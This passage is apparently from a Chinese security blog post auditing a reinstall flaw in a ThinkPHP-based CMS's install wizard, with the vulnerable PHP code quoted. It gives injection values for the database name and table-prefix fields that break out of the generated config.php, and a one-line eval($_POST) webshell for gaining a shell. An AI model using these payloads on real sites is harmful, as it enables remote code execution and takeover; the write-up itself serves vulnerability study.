<p>&#x4E0D;&#x4F1A;&#x8DF3;&#x8F6C;&#x5230;&#x4E3B;&#x9875;&#xFF0C;&#x76F4;&#x63A5;&#x8FDB;&#x5165;&#x5B89;&#x88C5;&#x5411;&#x5BFC;&#x9875;&#x9762;&#x3002;</p>
<p>&#x5176;&#x4ED6;&#x5730;&#x65B9;&#x6B63;&#x5E38;&#x586B;&#x5199;&#xFF0C;&#x5C06;&#x6570;&#x636E;&#x8868;&#x524D;&#x7F00;&#x6539;&#x4E3A;&#xFF1A;</p>
<pre><code>zs_&apos;);phpinfo();//
</code></pre><p><img src="https://i.loli.net/2019/05/19/5ce0b569747fd26998.jpg" alt="2_tianxie.jpg"></p>
<p>&#x70B9;&#x51FB;&#x4E0B;&#x4E00;&#x6B65;&#xFF0C;&#x6570;&#x636E;&#x5E93;&#x5C31;&#x53EF;&#x4EE5;&#x521B;&#x5EFA;&#x6210;&#x529F;</p>
<p><img src="https://i.loli.net/2019/05/19/5ce0b569337d168459.jpg" alt="2_chuangjianxchenggong.jpg"></p>
<p>&#x4E4B;&#x540E;&#x518D;&#x8BBF;&#x95EE;&#xFF1A;</p>
<p><a href="http://127.0.0.1/zwin/app/user/conf/config.php" target="_blank" rel="noopener">http://127.0.0.1/zwin/app/user/conf/config.php</a></p>
<p><img src="https://i.loli.net/2019/05/19/5ce0b56abedb011742.jpg" alt="2_config.jpg"></p>
<p>&#x53EF;&#x4EE5;&#x770B;&#x5230;phpinfo()&#xFF0C;&#x628A;phpinfo()&#x4FEE;&#x6539;&#x4E3A;&#xFF1A;<code>eval($_POST[&apos;abc&apos;])</code>&#x5C31;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;getshell&#xFF1B;</p>
<p>&#x6F0F;&#x6D1E;&#x590D;&#x73B0;&#x6210;&#x529F;</p>
<h3 id="&#x4EE3;&#x7801;&#x5206;&#x6790;-1"><a href="#&#x4EE3;&#x7801;&#x5206;&#x6790;-1" class="headerlink" title="&#x4EE3;&#x7801;&#x5206;&#x6790;"></a>&#x4EE3;&#x7801;&#x5206;&#x6790;</h3><p>&#x5B58;&#x5728;&#x6F0F;&#x6D1E;&#x7684;&#x9875;&#x9762;&#xFF1A;</p>
<p>install/install/controller/indexcontroller.class.php</p>
<p>&#x9875;&#x9762;&#x5F00;&#x5934;&#x5B58;&#x5728;&#x4E00;&#x4E2A;index()&#x65B9;&#x6CD5;&#x7528;&#x4E8E;&#x5224;&#x65AD;&#x662F;&#x5426;&#x5B89;&#x88C5;&#x6210;&#x529F;&#xFF1A;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">   <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">index</span><span class="hljs-params">()</span></span>{</span><br><span class="line">   <span class="hljs-keyword">if</span> (is_file(<span class="hljs-string">&apos;./Data/install.lock&apos;</span>)) {</span><br><span class="line">	header(<span class="hljs-string">&apos;Location: ./index.php&apos;</span>);</span><br><span class="line">	<span class="hljs-keyword">exit</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>&#x6839;&#x636E;&#x53C2;&#x8003;&#x6587;&#x7AE0;&#x7684;&#x8BF4;&#x6CD5;&#xFF1A;</p>
<pre><code>&#x4F46;&#x662F;&#x8FD9;&#x4E2A;&#x4E0D;&#x662F;&#x7C7B;&#x7684;&#x521D;&#x59CB;&#x5316;&#x51FD;&#x6570;&#x6240;&#x4EE5;&#x4E0D;&#x5F71;&#x54CD;&#x5176;&#x4ED6;&#x65B9;&#x6CD5;&#x7684;&#x4F7F;&#x7528;&#x3002;
</code></pre><p>&#x6211;&#x5728;&#x9875;&#x9762;&#x5F53;&#x4E2D;&#x6CA1;&#x6709;&#x627E;&#x5230;&#x5F15;&#x7528;index()&#x65B9;&#x6CD5;&#x7684;&#x8BED;&#x53E5;&#xFF0C;&#x5E94;&#x8BE5;&#x662F;ThinkPHP&#x6846;&#x67B6;&#x7684;&#x4E00;&#x4E9B;&#x56FA;&#x5B9A;&#x7528;&#x6CD5;&#x5427;&#x3002;&#x8FD9;&#x4E2A;&#x95EE;&#x9898;&#x7B49;&#x540E;&#x9762;&#x5B66;&#x4E60;&#x4E86;ThinkPHP&#x6846;&#x67B6;&#x540E;&#x518D;&#x8BF4;&#x3002;</p>
<p>&#x7EE7;&#x7EED;&#x5F80;&#x4E0B;&#x770B;&#x3002;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">finish_done</span><span class="hljs-params">()</span> </span>{</span><br><span class="line">		...</span><br><span class="line"></span><br><span class="line">		$auth  = build_auth_key();</span><br><span class="line">		</span><br><span class="line">		$config_data[<span class="hljs-string">&apos;DB_TYPE&apos;</span>] = $temp_info[<span class="hljs-string">&apos;db_type&apos;</span>];</span><br><span class="line">		$config_data[<span class="hljs-string">&apos;DB_HOST&apos;</span>] = $temp_info[<span class="hljs-string">&apos;db_host&apos;</span>];</span><br><span class="line">		$config_data[<span class="hljs-string">&apos;DB_NAME&apos;</span>] = $temp_info[<span class="hljs-string">&apos;db_name&apos;</span>];</span><br><span class="line">		$config_data[<span class="hljs-string">&apos;DB_USER&apos;</span>] = $temp_info[<span class="hljs-string">&apos;db_user&apos;</span>];</span><br><span class="line">		$config_data[<span class="hljs-string">&apos;DB_PWD&apos;</span>] = $temp_info[<span class="hljs-string">&apos;db_pass&apos;</span>];</span><br><span class="line">		$config_data[<span class="hljs-string">&apos;DB_PORT&apos;</span>] = $temp_info[<span class="hljs-string">&apos;db_port&apos;</span>];</span><br><span class="line">		$config_data[<span class="hljs-string">&apos;DB_PREFIX&apos;</span>] = $&lt;strong&gt;temp_info&lt;/strong&gt;[<span class="hljs-string">&apos;db_prefix&apos;</span>];</span><br><span class="line">		$db = Db::getInstance($config_data);</span><br><span class="line">		$config_data[<span class="hljs-string">&apos;WEB_MD5&apos;</span>] = $auth;</span><br><span class="line">		$conf 	=	write_config($config_data);</span><br><span class="line">		</span><br><span class="line">		...</span><br><span class="line">	}</span><br></pre></td></tr></table></figure>

<p>&#x53EF;&#x77E5;&#xFF0C;&#x5728;finish_done()&#x65B9;&#x6CD5;&#x4E2D;&#xFF0C;&#x6709;&#x4E00;&#x4E2A;&#x51FD;&#x6570;&#x4E3A;write_config(),&#x6240;&#x4F20;&#x9012;&#x7684;&#x53C2;&#x6570;&#x4E3A;&#x6570;&#x636E;&#x5E93;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#x3002;</p>
<p>&#x800C;&#x8FD9;&#x4E9B;&#x6570;&#x636E;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#xFF0C;&#x90FD;&#x6CA1;&#x6709;&#x7ECF;&#x8FC7;&#x8FC7;&#x6EE4;&#x6216;&#x68C0;&#x67E5;&#x3002;&#x90FD;&#x662F;&#x76F4;&#x63A5;&#x63A5;&#x6536;POST&#x6570;&#x636E;&#x6765;&#x8FDB;&#x884C;&#x4F20;&#x9012;&#x7684;&#x3002;</p>
<p>&#x8DDF;&#x8E2A;&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x81F3;&#xFF1A;install/install/common/function.php</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">write_config</span><span class="hljs-params">($config, $auth)</span></span>{</span><br><span class="line">	<span class="hljs-keyword">if</span>(is_array($config)){</span><br><span class="line">		<span class="hljs-comment">//&#x8BFB;&#x53D6;&#x914D;&#x7F6E;&#x5185;&#x5BB9;</span></span><br><span class="line">		$conf = file_get_contents(MODULE_PATH . <span class="hljs-string">&apos;sqldata/conf.tpl&apos;</span>);</span><br><span class="line">		$user = file_get_contents(MODULE_PATH . <span class="hljs-string">&apos;sqldata/user.tpl&apos;</span>);</span><br><span class="line">		<span class="hljs-comment">//&#x66FF;&#x6362;&#x914D;&#x7F6E;&#x9879;</span></span><br><span class="line">		<span class="hljs-keyword">foreach</span> ($config <span class="hljs-keyword">as</span> $name =&gt; $value) {</span><br><span class="line">			$conf = str_replace(<span class="hljs-string">&quot;[{$name}]&quot;</span>, $value, $conf);</span><br><span class="line">			$user = str_replace(<span class="hljs-string">&quot;[{$name}]&quot;</span>, $value, $user);</span><br><span class="line">		}</span><br><span class="line"></span><br><span class="line">		<span class="hljs-comment">//&#x5199;&#x5165;&#x5E94;&#x7528;&#x914D;&#x7F6E;&#x6587;&#x4EF6;</span></span><br><span class="line">        file_put_contents(<span class="hljs-string">&apos;./App/Common/Conf/config.php&apos;</span>, $conf);</span><br><span class="line">        file_put_contents(<span class="hljs-string">&apos;./App/User/Conf/config.php&apos;</span>, $user);</span><br><span class="line">		<span class="hljs-keyword">return</span> <span class="hljs-string">&apos;&apos;</span>;</span><br><span class="line">	}</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>&#x53EF;&#x77E5;&#xFF0C;&#x51FD;&#x6570;&#x7684;&#x529F;&#x80FD;&#x662F;&#x8BFB;&#x53D6;sqldata&#x76EE;&#x5F55;&#x4E0B;&#x7684;&#x4E24;&#x4E2A;&#x914D;&#x7F6E;&#x6587;&#x4EF6;&#xFF0C;&#x5C06;&#x4F20;&#x9012;&#x8FDB;&#x6765;&#x7684;&#x6570;&#x636E;&#x5E93;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#x5206;&#x522B;&#x5199;&#x5165;&#x5230;&#x4E24;&#x4E2A;config.php&#x91CC;&#x53BB;&#x3002;</p>
<p>&#x5148;&#x770B;&#x4E00;&#x4E0B;user.sql:</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-comment">/**</span></span><br><span class="line"><span class="hljs-comment"> * UCenter&#x5BA2;&#x6237;&#x7AEF;&#x914D;&#x7F6E;&#x6587;&#x4EF6;</span></span><br><span class="line"><span class="hljs-comment"> * &#x6CE8;&#x610F;&#xFF1A;&#x8BE5;&#x914D;&#x7F6E;&#x6587;&#x4EF6;&#x8BF7;&#x4F7F;&#x7528;&#x5E38;&#x91CF;&#x65B9;&#x5F0F;&#x5B9A;&#x4E49;</span></span><br><span class="line"><span class="hljs-comment"> */</span></span><br><span class="line"></span><br><span class="line">define(<span class="hljs-string">&apos;UC_APP_ID&apos;</span>, <span class="hljs-number">1</span>); <span class="hljs-comment">//&#x5E94;&#x7528;ID</span></span><br><span class="line">define(<span class="hljs-string">&apos;UC_API_TYPE&apos;</span>, <span class="hljs-string">&apos;Model&apos;</span>); <span class="hljs-comment">//&#x53EF;&#x9009;&#x503C; Model / Service</span></span><br><span class="line">define(<span class="hljs-string">&apos;UC_AUTH_KEY&apos;</span>, <span class="hljs-string">&apos;[WEB_MD5]&apos;</span>); <span class="hljs-comment">//&#x52A0;&#x5BC6;KEY</span></span><br><span class="line">define(<span class="hljs-string">&apos;UC_DB_DSN&apos;</span>, <span class="hljs-string">&apos;[DB_TYPE]://[DB_USER]:[DB_PWD]@[DB_HOST]:[DB_PORT]/[DB_NAME]&apos;</span>); <span class="hljs-comment">// &#x6570;&#x636E;&#x5E93;&#x8FDE;&#x63A5;&#xFF0C;&#x4F7F;&#x7528;Model&#x65B9;&#x5F0F;&#x8C03;&#x7528;API&#x5FC5;&#x987B;&#x914D;&#x7F6E;&#x6B64;&#x9879;</span></span><br><span class="line">define(<span class="hljs-string">&apos;UC_TABLE_PREFIX&apos;</span>, <span class="hljs-string">&apos;[DB_PREFIX]&apos;</span>); <span class="hljs-comment">// &#x6570;&#x636E;&#x8868;&#x524D;&#x7F00;&#xFF0C;&#x4F7F;&#x7528;Model&#x65B9;&#x5F0F;&#x8C03;&#x7528;API&#x5FC5;&#x987B;&#x914D;&#x7F6E;&#x6B64;&#x9879;</span></span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>&#x9664;&#x4E86;DB_NAME, DB_PREFIX&#x53EF;&#x4EE5;&#x4FEE;&#x6539;&#x4EE5;&#x5916;&#xFF0C;&#x4FEE;&#x6539;&#x5176;&#x4ED6;&#x7684;&#x6570;&#x636E;&#x914D;&#x7F6E;&#x4F1A;&#x5BFC;&#x81F4;&#x6570;&#x636E;&#x5E93;&#x521B;&#x5EFA;&#x5931;&#x8D25;&#x3002;</p>
<p>&#x6240;&#x4EE5;&#xFF0C;&#x8FD9;&#x91CC;&#x53EF;&#x4EE5;&#x5229;&#x7528;&#x7684;&#x5C31;&#x5B58;&#x5728;&#x4E24;&#x5904;</p>
<p>&#x5C06;DB_NAME&#x8D4B;&#x503C;&#x4E3A;&#xFF1A;</p>
<pre><code>zswin1]&apos;);phpinfo();//
</code></pre><p>&#x6216;&#x8005;&#x5C06;DB_PREFIX&#x8D4B;&#x503C;&#x4E3A;&#xFF1A;</p>
<pre><code>zs_&apos;);phpinfo();//
</code></pre><p>&#x90FD;&#x53EF;&#x4EE5;&#x5229;&#x7528;&#x6210;&#x529F;&#x3002;</p>
<p>/App/User/Conf/config.php&#x5C31;&#x4F1A;&#x53D8;&#x6210;&#xFF1A;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">define(<span class="hljs-string">&apos;UC_DB_DSN&apos;</span>, <span class="hljs-string">&apos;mysql://root:root@127.0.0.1:3306/zswin1]&apos;</span>);phpinfo();<span class="hljs-comment">//&apos;); // &#x6570;&#x636E;&#x5E93;&#x8FDE;&#x63A5;&#xFF0C;&#x4F7F;&#x7528;Model&#x65B9;&#x5F0F;&#x8C03;&#x7528;API&#x5FC5;&#x987B;&#x914D;&#x7F6E;&#x6B64;&#x9879;</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-comment">//&#x6216;&#x8005;</span></span><br><span class="line"></span><br><span class="line">define(<span class="hljs-string">&apos;UC_TABLE_PREFIX&apos;</span>, <span class="hljs-string">&apos;zs_&apos;</span>);phpinfo();<span class="hljs-comment">//&apos;); // &#x6570;&#x636E;&#x8868;&#x524D;&#x7F00;&#xFF0C;&#x4F7F;&#x7528;Model&#x65B9;&#x5F0F;&#x8C03;&#x7528;API&#x5FC5;&#x987B;&#x914D;&#x7F6E;&#x6B64;&#x9879;</span></span><br></pre></td></tr></table></figure>

<p>sqldata/conf.tpl&#x4E5F;&#x662F;&#x4E00;&#x6837;&#x7684;&#x6B65;&#x9AA4;&#xFF0C;&#x53EA;&#x4E0D;&#x8FC7;user.tql&#x53EF;&#x4EE5;&#x66F4;&#x5BB9;&#x6613;&#x95ED;&#x5408;&#x8BED;&#x53E5;&#x3002;</p>
<h2 id="&#x9047;&#x5230;&#x7684;&#x95EE;&#x9898;"><a href="#&#x9047;&#x5230;&#x7684;&#x95EE;&#x9898;" class="headerlink" title="&#x9047;&#x5230;&#x7684;&#x95EE;&#x9898;"></a>&#x9047;&#x5230;&#x7684;&#x95EE;&#x9898;</h2><ul>
<li>&#x5BF9;&#x6846;&#x67B6;&#x7684;&#x7ED3;&#x6784;&#x8FD8;&#x662F;&#x4E0D;&#x592A;&#x4E86;&#x89E3;&#xFF0C;&#x662F;&#x5426;&#x8C03;&#x7528;&#xFF0C;&#x5982;&#x4F55;&#x8C03;&#x7528;&#x4E5F;&#x4E0D;&#x592A;&#x6E05;&#x695A;&#x3002;&#x9700;&#x8981;&#x53BB;&#x5B66;&#x4E60;&#x4E00;&#x4E0B;&#x6846;&#x67B6;&#x7684;&#x57FA;&#x672C;&#x77E5;&#x8BC6;&#x3002;</li>
</ul>

    
    </div>
    
    <div class="columns is-variable is-1 is-multiline is-mobile">
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/PHP/">#PHP</a></span>
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/代码审计/">#代码审计</a></span>
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/重装漏洞/">#重装漏洞</a></span>
    
    </div>
    
    
    <div class="columns is-mobile is-multiline article-nav">
        <span class="column is-12-mobile is-half-desktop  article-nav-prev">
            
            <a href="/2019/05/26/强网杯upload Writeup与简单分析/">强网杯upload Writeup与简单分析</a>
            
        </span>
        <span class="column is-12-mobile is-half-desktop  article-nav-next">
            
            <a href="/2019/05/17/JWT备忘录/">JWT备忘录</a>
            
        </span>
    </div>
    
</article>




    </div>
</section>
    <footer class="footer">
    <div class="container">
        <div class="columns content">
            <div class="column is-narrow has-text-centered">
                &copy; 2020 Threezh1&nbsp;
                Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> & <a href="http://github.com/ppoffice/hexo-theme-minos">Minos</a>
            </div>
            <div class="column is-hidden-mobile"></div>

            
            <div class="column is-narrow">
                <div class="columns is-mobile is-multiline is-centered">
                
                    
                <a class="column is-narrow has-text-black" title="GitHub" href="https://github.com/Threezh1">
                    
                    GitHub
                    
                </a>
                
                </div>
            </div>
            
            
        </div>
    </div>
</footer>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script>

<!-- test if the browser is outdated -->
<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.js"></script>
<script>
    $(document).ready(function () {
        // plugin function, place inside DOM ready function
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        })
    });
</script>

<script>
    window.FontAwesomeConfig = {
        searchPseudoElements: true
    }
    moment.locale("chinese");
</script>


    
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<script>
    MathJax.Hub.Config({
        "HTML-CSS": {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
</script>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.css" integrity="sha384-9eLZqc9ds8eNjO3TmqPeYcDj8n+Qfa4nuSiGYa6DjLNcv9BtN69ZIulL9+8CqC9Y" crossorigin="anonymous">
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.js" integrity="sha384-K3vbOmF2BtaVai+Qk37uypf7VrgBubhQreNQe9aGsz9lB63dIFiQVlJbr92dw2Lx" crossorigin="anonymous"></script>
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/contrib/auto-render.min.js" integrity="sha384-kmZOZB5ObwgQnS/DuDg6TScgOiWWBiVt0plIRkZCmE6rDZGrEOQeHM5PcHi+nyqe" crossorigin="anonymous" onload="renderMathInElement(document.body);"></script>

<script>
document.addEventListener("DOMContentLoaded", function() {
    renderMathInElement(document.body, {
        // ...options...
    });
});
</script>

    
    
<script src="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/js/lightgallery-all.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/js/jquery.justifiedGallery.min.js"></script>
<script>
    (function ($) {
        $(document).ready(function () {
            if (typeof($.fn.lightGallery) === 'function') {
                $('.article.gallery').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof($.fn.justifiedGallery) === 'function') {
                $('.justified-gallery').justifiedGallery();
            }
        });
    })(jQuery);
</script>

    
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.0/clipboard.min.js"></script>
    <style>
        .hljs {
            position: relative;
        }

        .hljs .clipboard-btn {
            float: right;
            color: #9a9a9a;
            background: none;
            border: none;
            cursor: pointer;
        }

        .hljs .clipboard-btn:hover {
          color: #8a8a8a;
        }

        .hljs > .clipboard-btn {
            display: none;
            position: absolute;
            right: 4px;
            top: 4px;
        }

        .hljs:hover > .clipboard-btn {
            display: inline;
        }

        .hljs > figcaption > .clipboard-btn {
            margin-right: 4px;
        }
    </style>
    <script>
      $(document).ready(function () {
        $('figure.hljs').each(function(i, figure) {
          var codeId = 'code-' + i;
          var code = figure.querySelector('.code');
          var copyButton = $('<button>Copy <i class="far fa-clipboard"></i></button>');
          code.id = codeId;
          copyButton.addClass('clipboard-btn');
          copyButton.attr('data-clipboard-target-id', codeId);

          var figcaption = figure.querySelector('figcaption');

          if (figcaption) {
            figcaption.append(copyButton[0]);
          } else {
            figure.prepend(copyButton[0]);
          }
        })

        var clipboard = new ClipboardJS('.clipboard-btn', {
          target: function(trigger) {
            return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
          }
        });
        clipboard.on('success', function(e) {
          e.clearSelection();
        })
      })
    </script>

    


<script src="/js/script.js"></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-mask"></div>
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="Type something...">
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: 'Posts',
                PAGES: 'Pages',
                CATEGORIES: 'Categories',
                TAGS: 'Tags',
                UNTITLED: '(Untitled)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js"></script>
    
</body>
</html>